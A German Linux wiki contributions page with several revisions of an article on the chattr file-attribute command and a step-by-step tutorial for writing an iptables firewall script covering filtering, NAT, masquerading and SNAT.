Xinux Wiki - Benutzerbeiträge [de]

Chattr

2019-10-30T14:47:33Z

Joshua.schreiner:

== chattr ==

chattr (change attribute) erlaubt es Attribute auf Ordner oder Dateien zu setzen
dies kann z.b. genutzt werden um eine Datei unveränderbar zu machen das sie
nicht gelöscht oder geändet werden kann

ein Attribut wird gesetzt mit

chattr [Parameter] +''Attribut Dateiname''

endfernt wird ein Attribut mit

chattr [Parameter] -ATTRIBUT DATEI

um sich die Attribute der Dateien anzuschauen

lsattr ''Dateiname''

== Einige Attribute ==

{| class="wikitable"
|A
|Bei Dateien mit diesem Attribut wird das Datum des letzten Zugriffes nicht gespeichert.
|-
|D
|wenn ein Ordner dieses Attribut besitzt und verändert wird, werden diese Veränderungen synchron auf die Festplatte geschrieben.
|-
|d
|Dateien mit diesem Attribut werden von dem Programm "dump" ignoriert.
|-
|i
|Dateien mit diesem Attribut können nicht verändert werden. Sie können nicht gelöscht oder modifiziert werden und man kann keinen harten Link (Hardlink) auf die Datei erstellen. Symbolische Links (Softlinks) sind weiterhin möglich. Dieses Attribut kann nur mit Root-Rechten gesetzt und entfernt werden.
|-
|S
|Wenn eine Datei dieses Attribut besitzt und verändert wird, werden diese Veränderungen synchron auf die Festplatte geschrieben.
|-
|u
|Wenn eine Datei mit diesem Attribut gelöscht wird, wird ihr Inhalt gespeichert, so dass ein User sie später wieder herstellen kann. Dieses Attribut hat momentan noch keine Auswirkungen auf ext2- und ext3-Dateisystemen.
|-
|x
|gibt an, ob eine vom Kernel gepackte Datei auch unentpackt gelesen werden kann.
|}

== Parameter ==

{| class="wikitable"
| -R
|Wenn man chattr mit diesem Parameter auf einen Ordner anwendet, werden alle Unterordner und Dateien rekursiv mit dem gewählten Attribut versehen bzw. das Attribut entfernt.
|-
| -V
|Dieser Paramter ist der Verbose-Modus und man erhält mehr Meldungen auf dem Screen, wenn man Dateiattribute setzt.
|}

== Beispiele ==

Eine Datei unveränderbar machen

sudo chattr +i ''Datei''

Alle Dateien in einem Ordner rekursiv unveränderbar machen:

sudo chattr -R +i ''Ordner''

Die Attribute einer Datei anzeigen:

lsattr ''Datei''

'''Links'''

https://wiki.ubuntuusers.de/chattr/

Chattr

2019-10-30T14:42:19Z

Joshua.schreiner: /* Parameter */

Chattr

2019-10-30T14:41:56Z

Joshua.schreiner: /* Parameter */

== chattr ==

chattr (change attribute) erlaubt es Attribute auf Ordner oder Dateien zu setzen
dies kann z.b. genutzt werden um eine Datei unveränderbar zu machen das sie
nicht gelöscht oder geändet werden kann

ein Attribut wird gesetzt mit

chattr [Parameter] +''Attribut Dateiname''

endfernt wird ein Attribut mit

chattr [Parameter] -ATTRIBUT DATEI

um sich die Attribute der Dateien anzuschauen

lsattr ''Dateiname''

== Einige Attribute ==

{| class="wikitable"
|A
|Bei Dateien mit diesem Attribut wird das Datum des letzten Zugriffes nicht gespeichert.
|-
|D
|wenn ein Ordner dieses Attribut besitzt und verändert wird, werden diese Veränderungen synchron auf die Festplatte geschrieben.
|-
|d
|Dateien mit diesem Attribut werden von dem Programm "dump" ignoriert.
|-
|i
|Dateien mit diesem Attribut können nicht verändert werden. Sie können nicht gelöscht oder modifiziert werden und man kann keinen harten Link (Hardlink) auf die Datei erstellen. Symbolische Links (Softlinks) sind weiterhin möglich. Dieses Attribut kann nur mit Root-Rechten gesetzt und entfernt werden.
|-
|S
|Wenn eine Datei dieses Attribut besitzt und verändert wird, werden diese Veränderungen synchron auf die Festplatte geschrieben.
|-
|u
|Wenn eine Datei mit diesem Attribut gelöscht wird, wird ihr Inhalt gespeichert, so dass ein User sie später wieder herstellen kann. Dieses Attribut hat momentan noch keine Auswirkungen auf ext2- und ext3-Dateisystemen.
|-
|x
|gibt an, ob eine vom Kernel gepackte Datei auch unentpackt gelesen werden kann.
|}

== Parameter ==

{| class="wikitable"
| -r
|Wenn man chattr mit diesem Parameter auf einen Ordner anwendet, werden alle Unterordner und Dateien rekursiv mit dem gewählten Attribut versehen bzw. das Attribut entfernt.
|-
| -v
|Dieser Paramter ist der Verbose-Modus und man erhält mehr Meldungen auf dem Screen, wenn man Dateiattribute setzt.
|}

Chattr

2019-10-30T14:41:36Z

Joshua.schreiner:

== chattr ==

chattr (change attribute) erlaubt es Attribute auf Ordner oder Dateien zu setzen
dies kann z.b. genutzt werden um eine Datei unveränderbar zu machen das sie
nicht gelöscht oder geändet werden kann

ein Attribut wird gesetzt mit

chattr [Parameter] +''Attribut Dateiname''

endfernt wird ein Attribut mit

chattr [Parameter] -ATTRIBUT DATEI

um sich die Attribute der Dateien anzuschauen

lsattr ''Dateiname''

== Einige Attribute ==

{| class="wikitable"
|A
|Bei Dateien mit diesem Attribut wird das Datum des letzten Zugriffes nicht gespeichert.
|-
|D
|wenn ein Ordner dieses Attribut besitzt und verändert wird, werden diese Veränderungen synchron auf die Festplatte geschrieben.
|-
|d
|Dateien mit diesem Attribut werden von dem Programm "dump" ignoriert.
|-
|i
|Dateien mit diesem Attribut können nicht verändert werden. Sie können nicht gelöscht oder modifiziert werden und man kann keinen harten Link (Hardlink) auf die Datei erstellen. Symbolische Links (Softlinks) sind weiterhin möglich. Dieses Attribut kann nur mit Root-Rechten gesetzt und entfernt werden.
|-
|S
|Wenn eine Datei dieses Attribut besitzt und verändert wird, werden diese Veränderungen synchron auf die Festplatte geschrieben.
|-
|u
|Wenn eine Datei mit diesem Attribut gelöscht wird, wird ihr Inhalt gespeichert, so dass ein User sie später wieder herstellen kann. Dieses Attribut hat momentan noch keine Auswirkungen auf ext2- und ext3-Dateisystemen.
|-
|x
|gibt an, ob eine vom Kernel gepackte Datei auch unentpackt gelesen werden kann.
|}

== Parameter ==

{| class="wikitable"
|-r
|Wenn man chattr mit diesem Parameter auf einen Ordner anwendet, werden alle Unterordner und Dateien rekursiv mit dem gewählten Attribut versehen bzw. das Attribut entfernt.
|-
|-v
|Dieser Paramter ist der Verbose-Modus und man erhält mehr Meldungen auf dem Screen, wenn man Dateiattribute setzt.
|}

Chattr

2019-10-30T14:38:56Z

Joshua.schreiner: /* Wichtigste Attribute */

Chattr

2019-10-30T14:33:26Z

Joshua.schreiner: /* Wichtigste Attribute */

Chattr

2019-10-30T14:26:09Z

Joshua.schreiner: Die Seite wurde neu angelegt: „ == chattr == chattr (change attribute) erlaubt es Attribute auf Ordner oder Dateien zu setzen dies kann z.b. genutzt werden um eine Datei unveränderbar zu…“

IPTables - from scratch

2019-10-10T14:14:18Z

Joshua.schreiner: /* Logging */

==Die Verwendung von Firewalls mit iptables==

Der Linux-Kernel enthält fortgeschrittene Tools für Packet-Filtering, der Prozess für die Kontrolle von Netzwerkpaketen bei ihrem Versuch einzudringen, durch und aus dem System hinaus zu dringen. Kernels vor der 2.4 Version konnten Pakete mit ipchains manipulieren, die Listen von Regeln verwendeten, die für Pakete in jeder Phase des Filterungsprozesses angewandt werden. Die Einführung des 2.4-Kernels hat iptables mit sich gebracht, die den ipchains gleichen, aber deren Wirkungsbereich und Kontrollmöglichkeiten bei der Filterung von Paketen erweitern.

==iptables Allgemein==

Iptables beinhaltet das englische Wort tables, was für Tabellen steht, und genauso kann man es sich auch vorstellen, denn in seinen 3 Tabellen sammeln sich die Ketten in denen Regeln zum Kontrollieren, Manipulieren oder Extrahieren von Paketen angegeben werden.

===Tabellen===
Wie Pakete verarbeitet werden wird schon in den Tabellen vorgegeben. iptables besitzt standardmäßig drei Tabellen: '''mangle''', '''nat''' und '''filter'''.

Die Tabelle '''mangle''' (übersetzt: zerhauen) ermöglicht es dem Kernel, Daten im Paket-Header zu verändern.

'''NAT''' wird benutzt um interne und externe IP-Adressen zu übersetzen (= '''N'''etwork '''A'''dress '''T'''ranslation). Regeln in dieser Tabelle ändern die IP und/oder den Port des Ziels oder Quelle.

Die Tabelle '''filter''' prüft alle für die Firewall ankommenden Pakete und entscheidet ob sie durchgelassen oder geblockt werden.

Jede dieser Tabellen besitzt nun mehrere Ketten:
:'''mangle''' (Paketmanipulationen): enthält alle Ketten
:'''nat''' (Network Adress Translation): enthält die Ketten PREROUTING, OUTPUT und POSTROUTING
:'''filter''' (Paketfilter): enthält die Ketten FORWARD, INPUT und OUTPUT

===Ketten===
Die Ketten sind eine Sammlung von Regeln. D.h. das jede Kette mehrere Regeln besitzen kann um ein Paket durchzulassen oder zu blockieren. Es sind fünf Typen von Standardketten vorhanden. Manche dieser Ketten werden von allen Paketen und einige nur, je nachdem welches Ziel sie haben, durchlaufen. Man könnte auch sagen die Ketten unterscheiden '''wo''' welche Regeln angewendet werden. Die Regeln einer Kette werden nacheinander abgearbeitet und wenn eine zutrifft, ist die Bearbeitung in dieser Kette beendet (es gibt Ausnahmen):

*'''PREROUTING''': alle Pakete kommen hier durch bevor eine Routing-Entscheidung getroffen wird
*'''FORWARD''': für alle Pakete, die von der einen zu einer anderen Netzwerkschnittstelle weitergeleitet werden - also keine Pakete die an einen lokalen Dienst gerichtet sind
*'''INPUT''': für Pakete die über eine Schnittstelle hereinkommen und einen Dienst auf dem Rechner ansprechen
*'''OUTPUT''': für die über eine Schnittstelle herausgehenden Pakete, die von einem lokalen Dienst kommen
*'''POSTROUTING''': alle Pakete kommen am Ende der Verarbeitung hier durch

===Regeln===

Mit einer Regel wird entschieden was mit einem Paket passieren soll. Jede besitzt bestimmte Parameter nach denen sie überprüft ob die Informationen eines Paketes auf sie zutreffen. Wenn die Parameter zutreffend sind, wird das Paket meist an ein neues Ziel verwiesen oder es wird eine Methode angewandt. Für die Bearbeitung der Pakete gibt es mehrere Ziele und Methoden. Häufig benutzte sind:

*'''ACCEPT''': das Paket kann passieren
*'''REJECT''': das Paket wird zurückgewiesen und ein Fehlerpaket wird gesendet
*'''LOG''': schreibt einen Eintrag in die syslog
*'''DROP''': das Paket wird ignoriert und keine Antwort gesendet
*'''REDIRECT''': die Ziel-Adresse des Paketes wird hiermit so verändert, dass es zum lokalen Rechner gesendet wird
*'''MASQUERADE''': die Quell-Adresse des Paketes wird durch die IP-Adresse der Schnittstelle ersetzt, auf dem es den Rechner verlässt
*'''SNAT'''
*'''DNAT'''

----

Somit funktioniert iptables wie eine Art Sammlung von Schablonen die nacheinander auf ein Paket abgebildet werden und bei einem Treffer eine bestimmte Aktion auf das Paket ausführen. Falls keine der Schablonen passen sollte wird eine Standard Aktion ausgeführt die für alle Pakete gilt die nicht auf eine Schablone passen.

Konzept-Bild

[[file:iptables-konzept.jpeg|750px]]

===Syntax Allgemein===

Wie schon zu erwarten bedient man iptables mit dem Befehl '''iptables'''. Folgende Dinge sind vorab zu beachten:

Die Momentan in der '''filter''' Tabelle gesetzten Ketten und Regeln kann man sich mit
root@hutze:~# iptables -L
ausgeben lassen, wobei man die Ausgabe noch mit den Operanden
-n # für numerical
-v # für verbose
erweitern kann.

Dabei ist es wichtig zu bemerken das jede iptables zeile ohne '''-t''' option von einem '''-t filter''' ausgeht.
Was bedeutet das es die Filter Tabelle geschrieben wird.
Um die anderen Tabellen zu schreiben braucht man '''-t nat''' und '''-t mangle'''

Die 3 Tabellen von iptables spricht man jeweils mit
iptables ['''-t filter''']
iptables '''-t nat'''
iptables '''-t mangle'''
an.

Jeder dieser Tabellen Angaben folgt für gewöhnlich eine Kette. Diese sind: '''INPUT''' '''OUTPUT''' und '''FORWARD''' sowie ausschließlich für ''nat'' und ''mangle'' auch '''PREROUTING''' und '''POSTROUTING'''. Und müssen mit dem davor stehenden Operanden '''-A''' ( '''A'''ppend - englisch für Anhängen ) definiert werden.

Beispiele:
iptables -A '''INPUT'''
iptables -t nat -A '''POSTROUTING'''

Wenn man also Regeln aufstellen will muss man immer die Tabelle und das dazugehörige Kettenglied übergeben, damit der Router genau weiß was wo zu tun ist.

Die Tabellen und Regeln von iptables könnte man theoretisch auch alle einzeln nacheinander in der Konsole eingeben was aber nicht ganz Sinn der Sache ist. Also bedienen wir uns für unsere Firewall einem simplen Bash-Skript.

==Positionierung der Firewall vor Ubuntu 16.04==

Eine Firewall kann man unter Linux ganz einfach mit einem vi-Dokument beginnen. Damit die daraus entstehende Firewall auch ausgeführt wird müssen wir es in den entsprechenden Verzeichnissen vermerken. Das Skript selbst sollte nach '''/etc/init.d/''' mit einem '''softlink''' mit dem '''prefix "S99"''' in '''/etc/rc2.d''' damit es beim Starten automatisch ausgeführt wird.
root@hutze:~# touch firewall
root@hutze:~# mv firewall /etc/init.d
root@hutze:~# ln -s /etc/init.d/firewall /etc/rc2.d/S99firewall

==Positionierung der Firewall ab Ubuntu 16.04==
Ab Ubuntu 16.04 wurde das übliche init durch das neue systemd ersetzt. Daher muss die Firewall in /usr/local/sbin platziert werden und wie im unteren Link angegeben der Service-File erstellt werden
*[[Systemd#Service_File]]

==Der Rumpf==
Zuerst wird in dem firewall-Skript ein case start - stop Block angelegt:

'''#!/bin/bash'''
'''case $1 in'''
'''start)'''
'''echo "starte firewall"'''
''';;'''
'''stop)'''
'''echo "stoppe firewall"'''
''';;'''
'''*)'''
'''echo "usage: $0 start|stop"'''
''';;'''
'''esac'''

==Filter Tabelle==
Beginnen wir unsere Firewall mit ihrer simpelsten Funktion: dem Paketfilter.
===Flushing===

Bevor wir unsere eigenen Regeln entwerfen, sollten wir sichergehen das sich keine alten Regeln einschleichen und zu unerwarteten Komplikationen führen.
Dieses wird durch das sogenannte "flushing" erreicht, welches mit folgender Zeile geschieht:
#!/bin/bash
case $1 in
start)
echo "starte firewall"
'''iptables -F'''
'''iptables -t nat -F'''
'''iptables -t mangle -F'''

;;
stop)
echo "stoppe firewall"
'''iptables -F'''
'''iptables -t nat -F'''
'''iptables -t mangle -F'''

;;
esac

Ohne flushing kann es auch passieren das sich unsere Regeln bei jedem Neustart der Firewall addieren.

;Verwendete Syntax
:Der Operand '''-F''' löst das flushing aus mit dem alle Regeln in der angegebenen Tabelle ( hier "-t filter" da keine angegeben ) entfernt werden

;Wichtig
:Wenn man zukünftig auch Regeln in die ''nat'' und ''mangle'' Tabellen schreiben möchte, muss man dazu sichergehen das auch diese bei jedem Start und Stop jeweils geflusht werden damit keine Komplikationen entstehen.

===Default policy===

Als nächstes definieren wir was passieren soll falls keine unserer Regeln zutreffen sollte, auch gennannt '''"default policy"'''

Dies geschieht mit folgenden Zeilen:

#!/bin/bash
case $1 in
start)
echo "starte firewall"
iptables -F
'''iptables -P INPUT DROP'''
'''iptables -P OUTPUT DROP'''
'''iptables -P FORWARD DROP'''
;;
stop)
echo "stoppe firewall"
iptables -F
'''iptables -P INPUT ACCEPT'''
'''iptables -P OUTPUT ACCEPT'''
'''iptables -P FORWARD ACCEPT'''
;;
esac

;Verwendete Syntax
:Wie in Syntax Allgemein angegeben muss die '''"default policy"''' auf alle 3 Anlaufstellen angewendet werden.
:Nach der Anlaufstelle geben wir an was mit den Paketen zu tun ist.
:Mit '''DROP''' lässt die gestartete Firewall alle Pakete fallen die nicht auf eine Regel passen.
:Mit '''ACCEPT''' lässt die gestoppte Firewall alle Pakete durch.

===ESTABLISHED und RELATED Pakete===

Ein Vorteil von iptables zu seinen Vorgängern ist die Funktion seinen Paketfilter nur auf die ersten Pakete einer Verbindung zu begrenzen und so Ressourcen zu sparen.

Dieses wird erreicht mit folgenden Zeilen

#!/bin/bash
case $1 in
start)
echo "starte firewall"
iptables -F
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
'''iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT'''
'''iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT'''
'''iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT'''
;;
stop)
echo "stoppe firewall"
iptables -F
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
;;
esac

;Verwendete Syntax
:Die neuen Funktionen die wir hier verwenden beinhalten:
:'''-m state''': Das Modul von iptables das erkennt ob ein Paket eine Verbindung initiiert oder zu einer bereits errichteten Verbindung gehört.
:'''--state ESTABLISHED,RELATED''': Der Status nach dem das Paket untersucht wird, wobei
:'''ESTABLISHED''': Für alle Pakete steht die nicht das erste Paket einer Verbindung ist die in beide Richtungen sendet. (TCP)
:'''RELATED''': Für alle Pakete steht die eine 2t Verbindung öffnen wollen. (FTP,ICMP)
:'''-j ACCEPT''': Benutzt die angegebene Operation auf das Paket, hier ACCEPT.

===loopback device===

Nun haben wir schon ein paar Regeln aber noch keine die bisher zutreffen kann. Wenn wir diese Firewall aktivieren würden wäre unser eigener Router Nichtmal mehr in der Lage mit sich selbst zu kommunizieren. Da er dies über das sogennante '''"loopback device"''' lassen wir jetzt unsere ersten Pakete durch.

#!/bin/bash
case $1 in
start)
echo "starte firewall"
iptables -F
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
'''iptables -A OUTPUT -o lo -m state --state NEW -j ACCEPT'''
'''iptables -A INPUT -i lo -m state --state NEW -j ACCEPT'''
;;
stop)
echo "stoppe firewall"
iptables -F
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
;;
esac

;Verwendete Syntax
:Hier geben wir nun zum ersten mal zur Anlaufstelle auch das jeweilige Interface das angelaufen wird mit an:
:Mit '''-o lo''' beschreiben wir als ''output'' also Ausgang die Schnittstelle ''lo'' was für das loopback device steht
:Genauso '''-i lo''' wobei lo hier als Eingang angegeben wird. In einem Satz:
:Alle Pakete die von unserem Router aus lo Ausgehen durchlassen
:Alle Pakete die an unserem Router an lo Ankommen durchlassen

===Fernwartung===

Angenommen unser Router mit der Firewall steht nicht im selben Netz wie unser üblicher Arbeitsrechner, ist es von Vorteil auch von außen auf ihn zugreifen zugreifen zu können. In unserem Beispiel ist das äußere Netz auch ein LAN.
#!/bin/bash
case $1 in
start)
echo "starte firewall"
iptables -F
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
'''iptables -A INPUT -i eth0 -s 192.168.241.10 -p tcp --dport 22 -m state --state NEW -j ACCEPT'''
;;
stop)
echo "stoppe firewall"
iptables -F
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
;;
esac

;Verwendete Syntax
:'''-s''': Passt auf die angegebene Quell IP-Adresse, hier 192.168.241.10
:'''-p''': Passt auf ein Protokoll, hier tcp
:'''-dport''': Passt auf Ziel Port, hier 22 (ssh)
:'''--state NEW''': Passt auf Pakete die eine Verbindung Initiieren
===Adressen zusammenfassen===
'''iptables -A INPUT -i eth0 -s 192.168.241.10,10.81.3.1 -p tcp --dport 22 -m state --state NEW -j ACCEPT'''

===DNS-Server und HTTP===

Jetzt möchten wir mit unserem Router ins Internet gehen können. Dazu müssen wir 2 Dinge tun, zuerst müssen wir erlauben das er auf DNS-Server zugreifen kann.

#!/bin/bash
case $1 in
start)
echo "starte firewall"
iptables -F
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -i eth0 -s 192.168.241.10 -p tcp --dport 22 -m state --state NEW -j ACCEPT
'''iptables -A OUTPUT -o eth0 -p tcp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT'''
'''iptables -A OUTPUT -o eth0 -p udp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT'''
;;
stop)
echo "stoppe firewall"
iptables -F
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
;;
esac

;Verwendete Syntax
:'''-d''': Das selbe Prinzip wie auch bei '''-s''' aber auf eine Ziel Adresse
----
Dann müssen wir auch noch eine Regel für HTTP aufstellen damit wir auch Internetseiten aufrufen dürfen
#!/bin/bash
case $1 in
start)
echo "starte firewall"
iptables -F
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -i eth0 -s 192.168.241.10 -p tcp --dport 22 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p udp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT
'''iptables -A OUTPUT -o eth0 -p tcp --dport 80 -m state --state NEW -j ACCEPT'''
;;
stop)
echo "stoppe firewall"
iptables -F
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
;;
esac

===ICMP===

Jetzt wollen wir testen können ob unser Router erreichbar ist. Dazu müssen wir ICMP freischalten
#!/bin/bash
case $1 in
start)
echo "starte firewall"
iptables -F
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -i eth0 -s 192.168.241.10 -p tcp --dport 22 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p udp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --dport 80 -m state --state NEW -j ACCEPT
'''iptables -A INPUT -i eth0 -p icmp --icmp-type 8 -j ACCEPT'''
;;
stop)
echo "stoppe firewall"
iptables -F
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
;;
esac

;Verwendete Syntax
:'''--icmp-type 8''' Beschränkt erlaubte ICMP Pakete auf typ 8 ( echo )

==NAT Tabelle==

NAT steht für Network Address Translation, also eine Übersetzung von Netzwerk Adressen, sei es in Namen oder auch einfach nur in andere IP-Adressen. Iptables kann diesen Job übernehmen und zwar auf verschiedene Art und Weise.

;Wichtig
:Da wir nun beginnen NAT regeln in die firewall zu schreiben dürfen wir nicht vergessen die Zeile zum flushen eben jener hinzuzufügen

===MASQUERADE===

Masquerading ist wohl die simpelste Form von NAT, hiermit ersetzt der Router einfach jede Quell IP-Adresse jedes zu routenden Paketes mit seiner eigenen, sowie bei einem Antwort Paket die Ziel Adresse wieder mit der Original Quell Adresse.In iptables erreicht man diese Funktion mit folgender Zeile
#!/bin/bash
case $1 in
start)
echo "starte firewall"
iptables -F
'''iptables -F -t nat'''
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -i eth0 -s 192.168.241.10 -p tcp --dport 22 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p udp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --dport 80 -m state --state NEW -j ACCEPT
iptables -A INPUT -i eth0 -p icmp --icmp-type 8 -j ACCEPT
'''iptables -t nat -A POSTROUTING -s 172.23.242.0/24 -j MASQUERADE -o eth0 '''
;;
stop)
echo "stoppe firewall"
iptables -F
'''iptables -F -t nat'''
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
;;
esac

;Verwendete Syntax
:'''-t nat''': Hier sehen wir zum ersten mal wie man eine andere Tabelle außer Filter anspricht
:'''POSTROUTING''': Damit der Router weiß das er den Adressen Tausch NACH dem Routing ausführen soll
:'''-j MASQUERADE''': Eine weitere Aktion die auf ein Paket ausgeführt werden kann, hier unser NAT
:'''-s 172.23.242.0/24''': Hier wird nicht nur eine IP-Adresse, sondern ein ganzer Netzbereich als Quelle angegeben

===FORWARD===
Um den an die Firewall angeschlossenen Rechnern einen Netzzugang zu gestatten müssen wir deren DNS Anfragen zulassen

#!/bin/bash
case $1 in
start)
echo "starte firewall"
iptables -F
'''iptables -F -t nat'''
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -i eth0 -s 192.168.241.10 -p tcp --dport 22 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p udp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --dport 80 -m state --state NEW -j ACCEPT
iptables -A INPUT -i eth0 -p icmp --icmp-type 8 -j ACCEPT
iptables -t nat -A POSTROUTING -s 172.23.242.0/24 -j MASQUERADE -o eth0 '''
'''iptables -A FORWARD -i vmbr1 -o vmbr0 -p tcp --dport 53 -m state --state NEW -j ACCEPT'''
'''iptables -A FORWARD -i vmbr1 -o vmbr0 -p udp --dport 53 -m state --state NEW -j ACCEPT'''

;;
stop)
echo "stoppe firewall"
iptables -F
'''iptables -F -t nat'''
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
;;
esac

;Verwendete Syntax
:'''-i ''': Hier wird die Schnittstelle definiert auf der die Anfragen an die Firewall eingehen
:'''-o''': Hier wird die Schnittstelle definiert auf die Anfragen die Firewall verlassen
:'''FORWARD''': Damit die Firewall weiß, dass das Paket weitergeleitet werden soll
:'''--dport''': Hier wird der Zielport der Anfragen definiert

===MULTIPORT===

Ausser dem DNS müssen zum arbeiten noch andere Ports geöffnet werden. Um nicht für jeden eine einzelne Regel anlegen zu müssen bietet sich die Nutzung des Parameters Multiport an.

#!/bin/bash
case $1 in
start)
echo "starte firewall"
iptables -F
'''iptables -F -t nat'''
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -i eth0 -s 192.168.241.10 -p tcp --dport 22 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p udp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --dport 80 -m state --state NEW -j ACCEPT
iptables -A INPUT -i eth0 -p icmp --icmp-type 8 -j ACCEPT
iptables -t nat -A POSTROUTING -s 172.23.242.0/24 -j MASQUERADE -o eth0 '''
iptables -A FORWARD -i vmbr1 -o vmbr0 -p tcp --dport 53 -m state --state NEW -j ACCEPT
iptables -A FORWARD -i vmbr1 -o vmbr0 -p udp --dport 53 -m state --state NEW -j ACCEPT
'''iptables -A FORWARD -i vmbr1 -o vmbr0 -p tcp -m multiport --dport 22,25,80,443,143 -m state --state NEW -j ACCEPT'''
;;
stop)
echo "stoppe firewall"
iptables -F
'''iptables -F -t nat'''
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
;;
esac

;Verwendete Syntax

:'''-m multiport''': Hiermit weiß die Firewall, daß unter '''--dport''' mehrere Ports hinterlegt wurden

===SNAT===

SNAT ist Masquerading sehr ähnlich, der einzige Unterschied besteht darin das man sich bei SNAT die ersetzende IP-Adresse wählen kann. Da wir schon Masquerading eingebaut haben, hängen wir SNAT nicht auch noch mit in unsere Firewall.

Hier aber ein Beispiel:
iptables -t nat -A POSTROUTING -j SNAT -o eth0 -s 172.23.242.0/24 --to-source 192.168.242.100

;Verwendete Syntax
:'''-j SNAT''': Die auszuführende Aktion, hier SNAT
:'''--to-source 192.168.242.100''': Die Angabe zu welcher IP-Adresse ersetzt wird, hier die des Routers.

===NETMAP===

